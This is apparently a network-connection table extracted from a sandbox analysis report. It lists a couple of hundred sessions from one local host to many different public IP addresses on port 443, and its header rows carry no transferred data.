                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18821192.168.2.13577841.156.111.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18822192.168.2.1346558108.192.133.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18823192.168.2.1337736104.67.209.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18824192.168.2.1347626155.68.87.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18825192.168.2.133789073.170.108.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18826192.168.2.1342516202.232.184.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18827192.168.2.1343458211.109.92.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18828192.168.2.1358544189.183.93.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18829192.168.2.133491051.60.102.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18830192.168.2.1352042167.153.76.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18831192.168.2.134988431.36.208.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18832192.168.2.1350254211.5.38.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18833192.168.2.1335676144.5.11.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18834192.168.2.1356926165.31.80.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18835192.168.2.133416687.4.61.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18836192.168.2.136023686.67.166.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18837192.168.2.1335762123.189.224.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18838192.168.2.135541027.107.51.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18839192.168.2.135108096.154.166.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18840192.168.2.1337498144.110.137.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18841192.168.2.135872688.223.96.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18842192.168.2.1356142213.160.54.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18843192.168.2.1360944174.189.79.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18844192.168.2.1344462191.106.61.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18845192.168.2.1334378111.111.185.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18846192.168.2.1358806144.84.166.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18847192.168.2.1345386129.193.156.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18848192.168.2.1356980218.52.138.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18849192.168.2.133870494.250.75.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18850192.168.2.135635224.94.0.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18851192.168.2.1339156186.164.252.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18852192.168.2.1350842119.12.126.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18853192.168.2.135987617.217.233.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18854192.168.2.1334188136.176.3.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18855192.168.2.135177054.221.220.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18856192.168.2.1353446103.125.201.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18857192.168.2.134120038.195.119.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18858192.168.2.13412981.237.6.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18859192.168.2.1333902148.102.37.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18860192.168.2.1352762216.180.87.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18861192.168.2.13402689.21.236.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18862192.168.2.135833075.44.115.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18863192.168.2.1356572140.173.62.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18864192.168.2.1348370196.114.250.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18865192.168.2.133765497.121.171.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18866192.168.2.133685625.69.244.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18867192.168.2.1343376177.49.58.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18868192.168.2.1356390200.107.63.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18869192.168.2.1347926150.98.13.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18870192.168.2.135537669.130.254.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18871192.168.2.13580482.101.250.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18872192.168.2.1350630156.46.252.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18873192.168.2.1340106121.38.0.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18874192.168.2.135173440.176.56.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18875192.168.2.1343792181.247.76.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18876192.168.2.134637861.197.84.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18877192.168.2.134498235.122.238.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18878192.168.2.1351124120.27.106.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18879192.168.2.1351336190.103.184.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18880192.168.2.1350782188.91.248.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18881192.168.2.135624283.223.144.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18882192.168.2.1343740136.122.77.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18883192.168.2.1353066205.187.115.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18884192.168.2.134275895.245.166.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18885192.168.2.1360618159.72.72.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18886192.168.2.1341506199.134.247.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18887192.168.2.1350692106.5.234.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18888192.168.2.1341730210.84.225.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18889192.168.2.1347566210.33.85.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18890192.168.2.1337090136.70.148.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18891192.168.2.135099881.155.217.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18892192.168.2.133772618.10.252.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18893192.168.2.1353490116.238.57.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18894192.168.2.1358326209.144.184.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18895192.168.2.13550061.43.5.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18896192.168.2.1357658152.91.129.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18897192.168.2.1336196146.239.94.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18898192.168.2.1347990211.133.108.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18899192.168.2.1358988213.73.244.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18900192.168.2.1347504100.53.155.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18901192.168.2.133685071.192.31.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18902192.168.2.136047292.216.157.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18903192.168.2.1346442222.68.158.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18904192.168.2.133848698.191.232.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18905192.168.2.135072671.241.239.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18906192.168.2.135899087.4.209.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18907192.168.2.1333632212.171.117.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18908192.168.2.1342542220.41.196.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18909192.168.2.1333942136.224.100.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18910192.168.2.1355314170.141.203.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18911192.168.2.1333172129.126.38.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18912192.168.2.1356370136.181.165.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18913192.168.2.1360924103.223.123.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18914192.168.2.1355062195.161.35.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18915192.168.2.1346614217.172.65.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18916192.168.2.1338314176.181.233.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18917192.168.2.1352876202.109.219.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18918192.168.2.133977067.119.254.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18919192.168.2.1353460100.6.253.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18920192.168.2.1358832158.107.134.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18921192.168.2.1333576109.253.53.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18922192.168.2.135835476.57.54.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18923192.168.2.1335794108.136.96.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18924192.168.2.135900295.151.118.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18925192.168.2.135761668.44.127.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18926192.168.2.1344334197.80.160.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18927192.168.2.1354148122.38.115.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18928192.168.2.1357834175.167.222.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18929192.168.2.134270262.36.88.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18930192.168.2.133497838.38.7.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18931192.168.2.1345078104.168.6.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18932192.168.2.1336016217.237.130.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18933192.168.2.1355438117.187.234.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18934192.168.2.1358732109.116.86.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18935192.168.2.134528084.143.134.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18936192.168.2.1353674184.104.136.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18937192.168.2.135091813.141.176.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18938192.168.2.1341230114.245.5.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18939192.168.2.1351150195.184.253.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18940192.168.2.133556463.98.224.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18941192.168.2.133881287.82.246.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18942192.168.2.133516074.215.119.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18943192.168.2.1359892169.180.139.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18944192.168.2.1338952119.195.199.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18945192.168.2.135239496.135.154.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18946192.168.2.1348134131.48.172.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18947192.168.2.135628677.254.234.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18948192.168.2.1355710168.150.178.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18949192.168.2.135110047.32.225.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18950192.168.2.135757294.217.241.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18951192.168.2.134383820.217.28.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18952192.168.2.1346916221.91.157.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18953192.168.2.134703653.178.161.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18954192.168.2.135526075.97.77.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18955192.168.2.134281698.171.202.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18956192.168.2.135778865.21.197.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18957192.168.2.1359756223.136.70.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18958192.168.2.1352316110.84.109.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18959192.168.2.1358420144.23.126.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18960192.168.2.1343842102.93.164.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18961192.168.2.134123077.180.120.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18962192.168.2.13607604.184.180.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18963192.168.2.135377463.41.134.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18964192.168.2.135579648.105.172.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18965192.168.2.134006664.41.2.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18966192.168.2.135559441.252.95.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18967192.168.2.135363869.135.139.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18968192.168.2.134949088.208.119.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18969192.168.2.1334360220.197.175.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18970192.168.2.134985680.231.92.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18971192.168.2.1337744197.5.102.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18972192.168.2.135763299.57.11.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18973192.168.2.1356968107.10.201.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18974192.168.2.135604463.217.162.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18975192.168.2.1336688196.229.108.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18976192.168.2.1351702186.195.30.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18977192.168.2.134691057.98.95.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18978192.168.2.1345318150.155.131.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18979192.168.2.1353794122.117.59.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18980192.168.2.1336194148.174.64.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18981192.168.2.133418472.13.144.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18982192.168.2.1332820147.27.27.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18983192.168.2.1358284110.157.192.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18984192.168.2.1333934151.2.83.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18985192.168.2.1354242106.193.51.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18986192.168.2.134569231.98.50.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18987192.168.2.1360156208.0.88.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18988192.168.2.1335352125.24.119.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18989192.168.2.1357622145.47.124.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18990192.168.2.134713492.233.226.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18991192.168.2.1351546171.65.104.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18992192.168.2.1347158150.44.165.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18993192.168.2.1336564145.78.93.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18994192.168.2.134733643.59.222.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18995192.168.2.1358420185.32.90.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18996192.168.2.1343184202.167.182.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18997192.168.2.1338386197.90.191.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18998192.168.2.1358758186.128.10.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18999192.168.2.133920850.86.110.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19000192.168.2.1335182143.48.67.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19001192.168.2.1350860201.227.124.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19002192.168.2.1350504218.151.68.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19003192.168.2.134375269.1.147.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19004192.168.2.1336196186.96.121.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19005192.168.2.135566492.244.76.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19006192.168.2.1334770117.33.248.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19007192.168.2.133279639.70.107.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19008192.168.2.134400044.229.182.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19009192.168.2.1347208103.212.63.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19010192.168.2.134036673.152.23.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19011192.168.2.1343750151.189.10.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19012192.168.2.1334534198.132.4.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19013192.168.2.134954275.211.113.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19014192.168.2.136085835.237.153.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19015192.168.2.1334720146.113.155.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19016192.168.2.133926469.187.64.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19017192.168.2.1352888199.235.235.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19018192.168.2.1349870192.167.162.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19019192.168.2.1351350189.163.73.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19020192.168.2.133813682.248.1.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19021192.168.2.1336738197.45.89.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19022192.168.2.1352214218.78.10.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19023192.168.2.133681882.238.108.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19024192.168.2.134688220.116.151.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19025192.168.2.133690292.159.100.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19026192.168.2.1351210135.45.53.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19027192.168.2.134048282.69.60.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19028192.168.2.135286238.75.116.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19029192.168.2.1350198176.224.195.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19030192.168.2.133287037.199.191.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19031192.168.2.1341570102.54.206.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19032192.168.2.133429047.114.244.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19033192.168.2.134135278.154.207.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19034192.168.2.1343908124.96.255.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19035192.168.2.1353408167.222.58.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19036192.168.2.1351418108.119.178.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19037192.168.2.1357846124.78.221.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19038192.168.2.135544270.74.131.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19039192.168.2.1352352157.21.206.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19040192.168.2.1346118184.101.180.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19041192.168.2.1350044200.72.124.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
